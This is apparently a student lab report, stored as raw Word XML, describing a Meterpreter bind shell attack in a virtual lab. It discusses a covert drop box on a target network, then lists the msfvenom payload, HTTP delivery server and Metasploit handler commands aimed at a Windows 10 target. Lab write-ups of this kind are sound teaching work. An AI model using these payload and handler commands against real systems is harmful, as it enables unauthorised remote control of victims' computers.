      <w:r w:rsidR="003244B0">
        <w:t xml:space="preserve"> persistence.</w:t>
      </w:r>
      <w:r w:rsidR="00D65BC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4A894" w14:textId="5A9657F0" w:rsidR="005E2A94" w:rsidRDefault="00495973" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The bind shell method would be most suitably </w:t>
      </w:r>
      <w:r w:rsidR="00FC0257">
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from within the same network as the ta</w:t>
      </w:r>
      <w:r w:rsidR="00FC2E01">
        <w:t xml:space="preserve">rget PC as the connection would be initiated by the attacker.  This connection would be blocked by default by most </w:t>
      </w:r>
      <w:r w:rsidR="005A0AAD">
        <w:t>firewalls;</w:t>
      </w:r>
      <w:r w:rsidR="000B4F47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000B4F47">
        <w:t>however</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000B4F47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002227FF">
        <w:t xml:space="preserve">it is </w:t>
      </w:r>
      <w:r w:rsidR="007A3FC9">
        <w:t>understood</w:t>
      </w:r>
      <w:r w:rsidR="000B4F47">
        <w:t xml:space="preserve"> there are techniques that can be used to overcome this</w:t>
      </w:r>
      <w:r w:rsidR="00FC2E01">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022B7A7" w14:textId="009555F5" w:rsidR="00A404A5" w:rsidRDefault="005E2A94" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>One possible scenario could be a drop box</w:t>
      </w:r>
      <w:r w:rsidR="005A42CB">
        <w:t xml:space="preserve"> stealthily</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> placed on the network</w:t>
      </w:r>
      <w:r w:rsidR="007A3FC9">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A3FC9">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r>
        <w:t>his could simply be a raspberry pi</w:t>
      </w:r>
      <w:r w:rsidR="00BF6534">
        <w:t xml:space="preserve">, that is programmed to </w:t>
      </w:r>
      <w:r w:rsidR="004D6270">
        <w:t xml:space="preserve">make an outbound </w:t>
      </w:r>
      <w:r w:rsidR="00BF6534">
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="004D6270">
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="00BF6534">
        <w:t xml:space="preserve"> to an attacker’s PC.  </w:t>
      </w:r>
      <w:r w:rsidR="003D7BCF">
        <w:t xml:space="preserve">Once that connection has been established between the </w:t>
      </w:r>
      <w:r w:rsidR="005A42CB">
        <w:t>drop box and the attacker’s PC</w:t>
      </w:r>
      <w:r w:rsidR="00C1022B">
        <w:t xml:space="preserve"> a bind shell can then be setup from the drop box to the </w:t>
      </w:r>
      <w:r w:rsidR="00BD2CDA">
        <w:t>target PC</w:t>
      </w:r>
      <w:r w:rsidR="005A42CB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD2CDA">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A1858" w14:textId="77777777" w:rsidR="00A404A5" w:rsidRDefault="00BD2CDA" w:rsidP="007516C3">
      <w:r>
        <w:t>There are several draw backs to this scenario</w:t>
      </w:r>
      <w:r w:rsidR="00A404A5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948BE9C" w14:textId="33AE2B18" w:rsidR="00495973" w:rsidRPr="004726D0" w:rsidRDefault="00A404A5" w:rsidP="00A404A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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</w:pPr>
      <w:r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>I</w:t>
      </w:r>
      <w:r w:rsidR="00BD2CDA"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>t would require physical access to the target network</w:t>
      </w:r>
      <w:r w:rsidR="00072BBA"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>, making it more likely that the attacker would be caught</w:t>
      </w:r>
      <w:r w:rsid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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E0DC0" w14:textId="5FB7A982" w:rsidR="00A404A5" w:rsidRPr="004726D0" w:rsidRDefault="00A404A5" w:rsidP="00A404A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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</w:pPr>
      <w:r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 xml:space="preserve">It would require the attacker to either access the </w:t>
      </w:r>
      <w:r w:rsidR="00933727"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>communications room</w:t>
      </w:r>
      <w:r w:rsidR="00E4469F"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 xml:space="preserve"> to connect the drop box directly to the switch</w:t>
      </w:r>
      <w:r w:rsidR="00933727"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 xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidR="00510547"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 xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00933727"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 xml:space="preserve">find an open </w:t>
      </w:r>
      <w:r w:rsidR="00E4469F"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>data point</w:t>
      </w:r>
      <w:r w:rsidR="00510547"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 xml:space="preserve">.  This presumes that the organisation is not filtering </w:t>
      </w:r>
      <w:r w:rsidR="00FA68FF"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>connectivity based on MAC address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7F514" w14:textId="22AAF299" w:rsidR="00FA68FF" w:rsidRPr="004726D0" w:rsidRDefault="00444D0E" w:rsidP="00A404A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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</w:pPr>
      <w:r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 xml:space="preserve">If the drop box were found by </w:t>
      </w:r>
      <w:r w:rsidR="00CA02FD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 xml:space="preserve">either </w:t>
      </w:r>
      <w:r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 xml:space="preserve">the security </w:t>
      </w:r>
      <w:r w:rsidR="005A0AAD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>or IT</w:t>
      </w:r>
      <w:r w:rsidR="005A0AAD"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 xml:space="preserve"> staff</w:t>
      </w:r>
      <w:r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>, it might be used to locate the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00585FD6"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 xml:space="preserve">, and could be used as evidence in any subsequent </w:t>
      </w:r>
      <w:r w:rsidR="004726D0" w:rsidRPr="004726D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>court proceedings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0F23DA" w14:textId="648C21B8" w:rsidR="008F6432" w:rsidRPr="007516C3" w:rsidRDefault="002820F2" w:rsidP="007516C3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF0357" w14:textId="77777777" w:rsidR="0072116A" w:rsidRDefault="0072116A" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="5EA69EAD" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="738E5A44" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="5929FBAF" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="0D932995" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="1219010E" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="0FEC3FAA" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="0EA57F58" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="3A3E9CD9" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00A37AE2"/>
    <w:p w14:paraId="6802B054" w14:textId="77777777" w:rsidR="004331D6" w:rsidRDefault="004331D6" w:rsidP="00467048">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Creating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00954B74">
        <w:t>Bind Shell with Meterpreter sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2031BE5C" w14:textId="77777777" w:rsidR="006919A0" w:rsidRDefault="006919A0" w:rsidP="00C7205B"/>
    <w:p w14:paraId="6FB2D389" w14:textId="08D97883" w:rsidR="00C7205B" w:rsidRDefault="00C7205B" w:rsidP="00C7205B">
      <w:r>
        <w:t xml:space="preserve">There were several steps to this </w:t>
      </w:r>
      <w:r w:rsidR="006919A0">
        <w:t xml:space="preserve">attack, which are best illustrated in the form of a flowchart, </w:t>
      </w:r>
      <w:r w:rsidR="00F10012">
        <w:t xml:space="preserve">which can be found </w:t>
      </w:r>
      <w:r w:rsidR="00885C1C">
        <w:t>below: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F5C0F7" w14:textId="77777777" w:rsidR="00BE2D9A" w:rsidRDefault="0046550C" w:rsidP="00BE2D9A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0046550C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074F2393" wp14:editId="5DF535ED">
            <wp:extent cx="5731510" cy="5605145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1855250287" name="Picture 3" descr="A diagram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250287" name="Picture 3" descr="A diagram of a computer pro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605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1478A0" w14:textId="19F0E760" w:rsidR="0046550C" w:rsidRPr="0046550C" w:rsidRDefault="00BE2D9A" w:rsidP="00BE2D9A">
      <w:pPr>
        <w:pStyle w:val="Caption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4" w:name="_Toc150072419"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Flowchart showing the process of carrying out the BIND Shell attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="00885C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAA732" w14:textId="77777777" w:rsidR="00CF7D81" w:rsidRDefault="00CF7D81" w:rsidP="00C7205B"/>
    <w:p w14:paraId="0BAE5F68" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00C7205B"/>
    <w:p w14:paraId="6FD1968F" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00C7205B"/>
    <w:p w14:paraId="049CE143" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00C7205B"/>
    <w:p w14:paraId="2484018E" w14:textId="77777777" w:rsidR="00A67103" w:rsidRDefault="00A67103" w:rsidP="00C7205B"/>
    <w:p w14:paraId="3AFCBCA3" w14:textId="7EE1B161" w:rsidR="00F10012" w:rsidRDefault="00CF7D81" w:rsidP="00CF7D81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r w:rsidR="00CE7873">
        <w:t>Setting up</w:t>
      </w:r>
      <w:r w:rsidR="0017760E">
        <w:t xml:space="preserve"> the BIND Shell lab work in the virtual environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06533CD3" w14:textId="77777777" w:rsidR="00CF7D81" w:rsidRDefault="00CF7D81" w:rsidP="00C7205B"/>
    <w:p w14:paraId="16F648F9" w14:textId="27092BB2" w:rsidR="0017760E" w:rsidRDefault="0017760E" w:rsidP="00C7205B">
      <w:r>
        <w:t xml:space="preserve">Two PCs were configured </w:t>
      </w:r>
      <w:r w:rsidR="00102A0E">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="008A188C">
        <w:t xml:space="preserve"> carry out this lab, a Kali attack PC and a Windows 10 </w:t>
      </w:r>
      <w:r w:rsidR="00807F93">
        <w:t>target PC</w:t>
      </w:r>
      <w:r w:rsidR="00CF7D81">
        <w:t>, as detailed below</w:t>
      </w:r>
      <w:r w:rsidR="00C264FE">
        <w:t>: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC99169" w14:textId="75EAA770" w:rsidR="008E5C17" w:rsidRPr="008E5C17" w:rsidRDefault="008E5C17" w:rsidP="008E5C1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E5C17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55FA3B80" wp14:editId="527BE41A">
            <wp:extent cx="5731510" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1984103136" name="Picture 6" descr="A computer screen shot of a red box and blue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103136" name="Picture 6" descr="A computer screen shot of a red box and blue box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78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C3A99E" w14:textId="49E900AD" w:rsidR="008E5C17" w:rsidRPr="009E7121" w:rsidRDefault="00294C9A" w:rsidP="009E7121">
      <w:pPr>
        <w:pStyle w:val="Caption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t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="004A20E1">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009E7121">
        <w:t xml:space="preserve"> - BIND Shell - Connection initiated by the Attack PC</w:t>
      </w:r>
      <w:r w:rsidR="005321AD">
        <w:t xml:space="preserve"> (Entered again here to be on the same page as the commands)</w:t>
      </w:r>
      <w:r w:rsidR="00885C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5399B99F" w14:textId="551C1EE5" w:rsidR="005B33A8" w:rsidRDefault="005B33A8" w:rsidP="00C7205B">
      <w:r>
        <w:t xml:space="preserve">Here are the commands that were carried out during this lab </w:t>
      </w:r>
      <w:r w:rsidR="00D202D8">
        <w:t>exercise: -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A0166" w14:textId="595CAA34" w:rsidR="0074040B" w:rsidRDefault="0074040B" w:rsidP="0074040B">
      <w:r>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidR="00D202D8">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali</w:t>
      </w:r>
      <w:r w:rsidR="00D202D8">
        <w:t xml:space="preserve"> attack PC: -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B612AF8" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -f exe &gt; /home/kali/temp/bind.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62548CFD" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56246479" w14:textId="0210F788" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CE9A1B4" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C3BA3" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterperter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64F8A964" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32873E9D" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979EC59" w14:textId="77777777" w:rsidR="0074040B" w:rsidRPr="00C264FE" w:rsidRDefault="0074040B" w:rsidP="00C264FE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C264FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256CC79C" w14:textId="77777777" w:rsidR="0074040B" w:rsidRDefault="0074040B" w:rsidP="0074040B"/>
    <w:p w14:paraId="7D509CC6" w14:textId="20A3F32B" w:rsidR="0074040B" w:rsidRDefault="0074040B" w:rsidP="0074040B">
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidR="006D2E43">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidR="006D2E43">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00D202D8">
        <w:t xml:space="preserve"> target </w:t>
      </w:r>
      <w:r w:rsidR="00885C1C">
        <w:t>PC: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14741CB4" w14:textId="66FC024A" w:rsidR="005B33A8" w:rsidRDefault="00C264FE" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidR="00DD0F8F">
        <w:t>would be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> necessary</w:t>
      </w:r>
      <w:r w:rsidR="00DD0F8F">
        <w:t xml:space="preserve"> for the target user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="0074040B">
        <w:t>disable Windows Defender</w:t>
      </w:r>
      <w:r w:rsidR="009864AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A93A0D">
        <w:t xml:space="preserve">Real Time protection </w:t>
      </w:r>
      <w:r w:rsidR="006D2E43">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="009864AC">
        <w:t xml:space="preserve"> download the bind.exe file.</w:t>
      </w:r>
      <w:r w:rsidR="00C433C9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006B2D05">
        <w:t xml:space="preserve">When this was attempted initially the file was </w:t>
      </w:r>
      <w:r w:rsidR="006D2E43">
        <w:t>downloaded but</w:t>
      </w:r>
      <w:r w:rsidR="006B2D05">
        <w:t xml:space="preserve"> was saved as an </w:t>
      </w:r>
      <w:r w:rsidR="00970436">
        <w:t xml:space="preserve">unusable format.  Once Realtime protection was disabled, it would still challenge the </w:t>
      </w:r>
      <w:r w:rsidR="00152D56">
        <w:t>installation, and required that the</w:t>
      </w:r>
      <w:r w:rsidR="007B6148">
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
      <w:r w:rsidR="00152D56">
        <w:t xml:space="preserve"> user instruct the PC that they wanted to Keep the file and to run anyway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8DED8D" w14:textId="77777777" w:rsidR="00DF4831" w:rsidRDefault="00DF4831" w:rsidP="0074040B"/>
    <w:p w14:paraId="6665EB62" w14:textId="77777777" w:rsidR="006D2E43" w:rsidRDefault="006D2E43" w:rsidP="0074040B"/>
    <w:p w14:paraId="4AB459B4" w14:textId="4B5EA23D" w:rsidR="00DF4831" w:rsidRDefault="005634F6" w:rsidP="00CE7873">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Carrying out the </w:t>
      </w:r>
      <w:r w:rsidR="002F547B">
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidR="00D1456E">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="002F547B">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:t>attack in a virtual lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172845DB" w14:textId="77777777" w:rsidR="00DF4831" w:rsidRDefault="00DF4831" w:rsidP="0074040B"/>
    <w:p w14:paraId="4E4CACF3" w14:textId="77777777" w:rsidR="004A20E1" w:rsidRDefault="004872D3" w:rsidP="004A20E1">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6CA63D" wp14:editId="2DBC3108">
            <wp:extent cx="5727700" cy="2889250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="205281549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889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4D3E39" w14:textId="5F5D02DF" w:rsidR="002F547B" w:rsidRDefault="004A20E1" w:rsidP="004A20E1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc150072420"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Checking IP Address and creating working folder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="006D2E43">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24965E65" w14:textId="77777777" w:rsidR="00DF4831" w:rsidRDefault="00DF4831" w:rsidP="0074040B"/>
    <w:p w14:paraId="163A1F41" w14:textId="77777777" w:rsidR="003D5578" w:rsidRDefault="004872D3" w:rsidP="003D5578">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02536E65" wp14:editId="449CCFBB">
            <wp:extent cx="5727700" cy="1162050"/>
